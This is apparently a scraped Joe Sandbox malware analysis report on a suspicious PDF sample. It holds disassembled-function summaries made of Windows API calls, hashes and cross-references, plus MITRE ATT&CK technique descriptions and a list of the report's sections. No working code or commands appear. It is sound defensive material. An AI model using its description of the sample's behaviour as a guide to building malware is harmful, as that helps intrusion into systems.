CloseHandle.KERNEL32(?), ref: 003E1203
CloseHandle.KERNEL32 ref: 003E120A
CloseHandle.KERNEL32 ref: 003E1211

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 4c6f2fc50146ac6c16e72b3a28f10dd483531105ef80a9b1645ff8e7d6878780
Instruction ID: 8822c78e5668854ddf06956a3f961762d41c76e41172ef861a3f27c08b8fe05b
Opcode Fuzzy Hash: 4c6f2fc50146ac6c16e72b3a28f10dd483531105ef80a9b1645ff8e7d6878780
Instruction Fuzzy Hash: EDE030366000159BCB026BA6ED099BF7B3CEB05717F0002A1F716D00E0DB214949CB61

Uniqueness

Uniqueness Score: 0.01%

Function 003EF574, Relevance: 9.0, APIs: 6, Instructions: 22fileCOMMON

APIs

MapViewOfFile.KERNEL32 ref: 003EF574
GetFileSize.KERNEL32(?,00000000), ref: 003EF583
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 003EF58D
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 003EF599
CloseHandle.KERNEL32 ref: 003EF5A0
CloseHandle.KERNEL32 ref: 003EF5A8

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 281df3642ce6553b822f08b380143dc585f795bf63e096ebc2be4f74e109641d
Instruction ID: 6e395c04ebc5fa95a5fa44f8f6ff4edaa275c0c3ea114fc48b627ff742c5bd91
Opcode Fuzzy Hash: 281df3642ce6553b822f08b380143dc585f795bf63e096ebc2be4f74e109641d
Instruction Fuzzy Hash: E4E0EC72200751AFE3032BA6BD8CB7F3AACEB4AB57F144165F305C11A0CB644945CB65

Uniqueness

Uniqueness Score: 0.01%

Function 003E7C6A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 147libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003E8106

Strings

.?, xrefs: 003E7F9E
ra:|, xrefs: 003E8007
Y<o, xrefs: 003E7D64
:yd(, xrefs: 003E8076

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: .?$:yd($ra:|$Y<o
API String ID: 1029625771-3643298796
Opcode ID: d218bda150f042bb089e31411669f42031dc00ae80a5ace2afbe0c6ff8112fe1
Instruction ID: cfe0a068c4c968e04129745e640bde9c1b85cbbc32b6544f81c8c67c9c03475c
Opcode Fuzzy Hash: d218bda150f042bb089e31411669f42031dc00ae80a5ace2afbe0c6ff8112fe1
Instruction Fuzzy Hash: FEB1A7B4C493A9DBDB21DF829A817DDBA71FB16300F6081C8D5993B315DB740A86CF86

Uniqueness

Uniqueness Score: 100.00%

Function 003ED1A3, Relevance: 7.5, APIs: 5, Instructions: 18windowsynchronizationCOMMON

APIs

TranslateMessage.USER32(?), ref: 003ED174
DispatchMessageW.USER32(?), ref: 003ED17E
WaitForSingleObject.KERNEL32(00000000), ref: 003ED18C
GetMessageW.USER32 ref: 003ED1A3
DestroyWindow.USER32 ref: 003ED1AE

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: Message$DestroyDispatchObjectSingleTranslateWaitWindow
String ID:
API String ID: 710846951-0
Opcode ID: f5b92d3f76e5b539c8508715955921caf2abe7c5a078d62e6a07bddd1ec20666
Instruction ID: 210bd5ab5eb5face8837b79865b5ada5dd9d0021e03f080c4e1c33d0522284b2
Opcode Fuzzy Hash: f5b92d3f76e5b539c8508715955921caf2abe7c5a078d62e6a07bddd1ec20666
Instruction Fuzzy Hash: 6FE0EC31944A44ABDB135BB5EC4CABD3F3DBB04341F254416F212D11B0D7749881DB14

Uniqueness

Uniqueness Score: 0.03%

Function 003EF5CA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

APIs

GetComputerNameW.KERNEL32(?), ref: 003EF5D6
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 003EF61D

Strings

`7?, xrefs: 003EF5F8
X, xrefs: 003EF665

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: X$`7?
API String ID: 4013585866-2410089815
Opcode ID: 1891f1d0c4551635cd683b3fcae4062704acc0402a268ca682fe25dced47bfa1
Instruction ID: 097a7054fd5114b3aefa870846a68eeac7c37a0615f48673c034a25e5542651b
Opcode Fuzzy Hash: 1891f1d0c4551635cd683b3fcae4062704acc0402a268ca682fe25dced47bfa1
Instruction Fuzzy Hash: 28113A709451A9AFEF239BA69D05BFB37A8AB01304F200235E141F50E1D6E08E0A8616

Uniqueness

Uniqueness Score: 12.89%

Function 003E2031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37processCOMMON

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 003E2055
CloseHandle.KERNEL32(?), ref: 003E207C
CloseHandle.KERNEL32(?), ref: 003E2085

Strings

D, xrefs: 003E2039

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: e2ef13447b280db7a97480d7062e8d3c6812329b7df062808973276ca538e0fa
Instruction ID: bc06c2bfd28c06ff8302e03e5b925d62723ad468d6c2bab0cfa5a74c072751d1
Opcode Fuzzy Hash: e2ef13447b280db7a97480d7062e8d3c6812329b7df062808973276ca538e0fa
Instruction Fuzzy Hash: 04F09031A40258ABEB225F99DC05BFE7B7CFB45B00F104252FA04A92D0DBB29990C754

Uniqueness

Uniqueness Score: 0.01%

Function 003EFA30, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29stringCOMMON

APIs

lstrcpyW.KERNEL32(?,003F7748), ref: 003EFA3B
lstrlenW.KERNEL32(?,?,003F7748), ref: 003EFA42
GetTickCount.KERNEL32(?,?,003F7748), ref: 003EFA54

Strings

x, xrefs: 003EFA77

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CountTicklstrcpylstrlen
String ID: x
API String ID: 974621299-2363233923
Opcode ID: 018f97e0bc5481583aedffad522eeb125e51b7556fd4fe9a4d945754609fe2e7
Instruction ID: df4d380d3cdb2d6a2f70357b79c68503c470312fdd2a432872d9049cb5ccdc33
Opcode Fuzzy Hash: 018f97e0bc5481583aedffad522eeb125e51b7556fd4fe9a4d945754609fe2e7
Instruction Fuzzy Hash: B3F020B3605358ABC7121FA0DC8852736A9EF40362F051074E805DB212DB74C800C3E0

Uniqueness

Uniqueness Score: 0.02%

Function 003EF430, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26UNIQUE

APIs

_snwprintf.NTDLL ref: 003EF485

Strings

0;?, xrefs: 003EF43B
P9?, xrefs: 003EF464
0r?, xrefs: 003EF447

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: _snwprintf
String ID: 0;?$0r?$P9?
API String ID: 3988819677-1773957121
Opcode ID: e3ba0b80211e5fc3413182a5a31947265057dc9e9da7d9fc44ca3c6f71313970
Instruction ID: 5844b678b5f32496433a2509c15f84974f676cb6a45695636778e484474e0b9c
Opcode Fuzzy Hash: e3ba0b80211e5fc3413182a5a31947265057dc9e9da7d9fc44ca3c6f71313970
Instruction Fuzzy Hash: FEE01A783541B863926732661C62EBF10468B80B90B500378F746AF3C2CCA05D1243EA

Uniqueness

Uniqueness Score: 37.75%

Function 003EFDD0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

APIs

_snwprintf.NTDLL ref: 003EFDEB
CloseHandle.KERNEL32(?), ref: 003EFE18
CloseHandle.KERNEL32(?), ref: 003EFE21
CloseHandle.KERNEL32(?), ref: 003EFE2A

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CloseHandle$_snwprintf
String ID:
API String ID: 2398838028-0
Opcode ID: 3f4a05224cc3939cd5e94f10ce14dd93b0a5bc76d07bcda7b105771c73edd702
Instruction ID: e68d4a9b4ec1bb7bd39dec8773c906322446379c728b1fb19878921d86efff64
Opcode Fuzzy Hash: 3f4a05224cc3939cd5e94f10ce14dd93b0a5bc76d07bcda7b105771c73edd702
Instruction Fuzzy Hash: 66F054B290002DABCF12ABA1ED059FF773DEF08315F400295FA05A60A1DB318F54CBA0

Uniqueness

Uniqueness Score: 0.01%

Function 003EFCA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32stringCOMMON

APIs

lstrlenW.KERNEL32 ref: 003EFCB5
GetTickCount.KERNEL32 ref: 003EFCC7

Strings

x, xrefs: 003EFCEA

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CountTicklstrlen
String ID: x
API String ID: 2992449761-2363233923
Opcode ID: 3160ae42f15a5d3d1c3dab3816e560a8904a0d8c821dc06662b45f79bd8212e7
Instruction ID: ce5bec66a0e0ad5b4432c99170d8a2cf4d4f7e3a316bb95c66caea4b1efb76aa
Opcode Fuzzy Hash: 3160ae42f15a5d3d1c3dab3816e560a8904a0d8c821dc06662b45f79bd8212e7
Instruction Fuzzy Hash: 61F0ECB36043556BE7211FA0EC88B163669EF40392F040075EA05EF292DBB0C80083E0

Uniqueness

Uniqueness Score: 0.02%

Function 003EF4B5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30fileUNIQUE

APIs

_snwprintf.NTDLL ref: 003EF4FF
DeleteFileW.KERNEL32(?), ref: 003EF516

Strings

P9?, xrefs: 003EF4DA

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: DeleteFile_snwprintf
String ID: P9?
API String ID: 366827715-723474213
Opcode ID: bb5a5c7c617a2d724fe36944604647abadd8de62d6dbb861cab386e7fd2af63e
Instruction ID: 9b87620f6108b7634a7d82d058b2c48346086d15c66793be47162fe62b50fa0c
Opcode Fuzzy Hash: bb5a5c7c617a2d724fe36944604647abadd8de62d6dbb861cab386e7fd2af63e
Instruction Fuzzy Hash: 92F08CB6A0017C57CB12AA609C45AFF726C9B84300F0003A5FA469B282DEB05A808BD9

Uniqueness

Uniqueness Score: 37.75%

Function 003EF840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19UNIQUE

APIs

GetTempPathW.KERNEL32 ref: 003EF840
GetTempFileNameW.KERNEL32(?,?,?,?), ref: 003EF850

Strings

@u?, xrefs: 003EF85C

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: @u?
API String ID: 3285503233-1811280988
Opcode ID: 870f2869c32bdc71434d670648c243e8b2c456cb26ea17515e8d7e020392fe17
Instruction ID: ef1a5dddd1b38257ac1135d32c7bb31d47c341ac58f3ba5130b4dbada89be291
Opcode Fuzzy Hash: 870f2869c32bdc71434d670648c243e8b2c456cb26ea17515e8d7e020392fe17
Instruction Fuzzy Hash: 33D0177460026D5BCA226BA69C099FB7B2CDB06391F000692BA1DC6261EE3089448BA1

Uniqueness

Uniqueness Score: 37.75%

Function 003E5EE5, Relevance: 5.1, APIs: 4, Instructions: 82COMMON

APIs

memset.NTDLL ref: 003E5EEE
memset.NTDLL ref: 003E5F7D
memset.NTDLL ref: 003E5F93
memset.NTDLL ref: 003E5FA9

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 4925c7ef6bc137609b3ef48485a61a08f170eb2cc53e471dec8c538b6ccb1f76
Instruction ID: a7bd7ac1c922687d3d16777bf40dbdb3da4831ff9ca7e4508911704975f70698
Opcode Fuzzy Hash: 4925c7ef6bc137609b3ef48485a61a08f170eb2cc53e471dec8c538b6ccb1f76
Instruction Fuzzy Hash: 263135B1E00655EBDB05CFA1C8817ADBBB4FF58304F14026AE006A77C0D334A651CF80

Uniqueness

Uniqueness Score: 0.00%

Function 003E5D95, Relevance: 5.1, APIs: 4, Instructions: 79COMMON

APIs

memset.NTDLL ref: 003E5DA8
memset.NTDLL ref: 003E5F7D
memset.NTDLL ref: 003E5F93
memset.NTDLL ref: 003E5FA9

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ad913b160eeeff589f8201d5208514b1de94ab04a1c9c5972e0f67f46c17d529
Instruction ID: e7a8454fc0b29294b1a54916ea5f6f5ed404708bf53efc41978def55581275c4
Opcode Fuzzy Hash: ad913b160eeeff589f8201d5208514b1de94ab04a1c9c5972e0f67f46c17d529
Instruction Fuzzy Hash: 903139B2E10BC2E7E7068F64D801BB5B774FBE9304F205316E4D596642EB78A6A4C7D0

Uniqueness

Uniqueness Score: 0.00%

Description:	Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Authentication logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process Monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	When operating systems boot up, they can start programs or applications called services that perform background system functions. A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process Monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process Monitoring, Process command-line parameters
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process Monitoring, Process command-line parameters, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DOC-642857352.pdf

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static PDF Info

General

Keywords Statistics

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 001F1FF0, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeUNIQUE

Function 001F1EE0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 73
nativeUNIQUE

Function 00211C10, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Function 002111CD, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Function 0021103C, Relevance: 7.5, APIs: 5, Instructions: 46
synchronizationCOMMON

Function 00212031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre